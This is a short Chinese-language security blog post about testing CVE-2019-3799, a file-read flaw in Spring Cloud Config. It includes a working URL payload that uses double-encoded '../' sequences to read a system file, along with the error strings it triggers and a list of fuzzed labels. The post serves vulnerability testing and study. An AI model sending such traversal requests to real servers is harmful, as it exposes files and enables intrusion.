spring boot相关漏洞测试

2021-05-06 分类：学习路上作者：微慑管理员评论(0)

1.spring cloud config 跨目录文件读取（CVE-2019-3799）：

参考：

spring cloud config任意文件读取测试

测试环境下载：https://github.com/spring-cloud/spring-cloud-config/releases?after=v1.4.7.RELEASE

根据官方文档，可以通过如下请求GET /{name}/{profile}/{label}/{path} 来获取配置文件，name，profile和label的含义与常规环境下的endpoint相同，而path是指文件名。

http://127.0.0.1:8888/admin/env/master/..%252f..%252f..%252f..%252f..%252f..%252fWindows%252Fwin.ini

如果label不存在则会提示如下：

>No such label: env

或者：

Cannot load environment

fuzz出来lable：

test、master、head等

MSF测试：

参考https://www.xd10086.com/posts/1808713361549490810/

本文标题：	spring boot相关漏洞测试
本文链接： (转载请附上本文链接)	https://vulsee.com/archives/vulsee_2021/0506_11397.html

转载请附本站链接，未经允许不得转载,,谢谢：微慑信息网-VulSee.com » spring boot相关漏洞测试